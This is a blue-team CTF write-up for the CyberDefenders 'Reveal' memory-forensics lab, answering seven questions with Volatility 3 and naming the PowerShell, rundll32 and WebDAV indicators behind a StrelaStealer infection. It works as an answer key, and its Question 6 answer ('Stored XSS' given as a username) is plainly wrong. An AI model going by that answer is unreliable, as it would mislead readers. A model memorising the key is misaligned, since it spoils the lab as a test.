Reveal writeup using volatility3 - cyberdefenders

Instructions: Uncompress the lab (pass: cyberdefenders.org)

Scenario: As a cybersecurity analyst for a leading financial institution, an alert from your SIEM solution has flagged unusual activity on an internal workstation. Given the sensitive financial data at risk, immediate action is required to prevent potential breaches.

Your task is to delve into the provided memory dump from the compromised system. You need to identify basic Indicators of Compromise (IOCs) and determine the extent of the intrusion. Investigate the malicious commands or files executed in the environment, and report your findings in detail to aid in remediation and enhance future defenses.

Tools: Volatility 3

Question 1/7 - Identifying the name of the malicious process helps in understanding the nature of the attack. What is the name of the malicious process?

As usual, we have to find the malicious process. We can use windows.malfind plugin to find any malicious functionalities. It find 2 main suspicious process.

smartscreen.exe
powershell.exe

After looking at the pstree smartscreen looks ligitmate then powershell

smartscreen.exe :

Reveal lab writeup cyberdefenders blue team image

powershell.exe :

It seems like some malicious command is being executed into the powershell.

Answer - powershell.exe

Question 2/7 - Knowing the parent process ID (PPID) of the malicious process aids in tracing the process hierarchy and understanding the attack flow. What is the parent PID of the malicious process?

We can use windows.pstree plugin to find the parent process id of malicious process.

Answer - 4120

Question 3/7 - Determining the file name used by the malware for executing the second-stage payload is crucial for identifying subsequent malicious activities. What is the file name that the malware uses to execute the second-stage payload?

Windows.pstree plugin also reveals that which file is being executed by the malware.

Answer - 3435.dll

Question 4/7 - Identifying the shared directory on the remote server helps trace the resources targeted by the attacker. What is the name of the shared directory being accessed on the remote server?

Windows.pstree plugin also reveals the directory whare the malicious file is stored and accessed by the attacker.

Answer - davwwwroot

Question 5/7 - What is the MITRE sub-technique ID used by the malware to execute the second-stage payload?

After doing some mitre techniques searches , when i searched for the rundll32 ( Windows utility that allows the execution of functions exported from a DLL), I got the technique :

Answer - T1218.011

Question 6/7 - Identifying the username under which the malicious process runs helps in assessing the compromised account and its potential impact. What is the username that the malicious process runs under?

To find the user who is responsible for running the process, we can user UserAssist registery values. There is a userassist plugin in Volatility3 is designed to parse and interpret the UserAssist registry keys from a memory dump.

As windows creates a directory for there users in c:\Users\USERNAME , we can use following command to get all possible usernames :

Code  bash
python3 /home/kali/tools/volatility3/vol.py -f 192-Reveal.dmp userassist | grep -i "users"

Output :

Answer - Stored XSS

Question 7/7 - Knowing the name of the malware family is essential for correlating the attack with known threats and developing appropriate defenses. What is the name of the malware family?

After doing some research about malicious files 3435.dll, I got the malware family :

Answer - StrelaStealer

Prev Next

CAPA: The Basics01/02/25 ctf → thm → capa-the-basics

SQLMap: The Basics31/01/25 ctf → thm → sqlmap-the-basics

SQL Fundamentals31/01/25 ctf → thm → sql-fundamentals

Powershell30/01/25 programming → powershell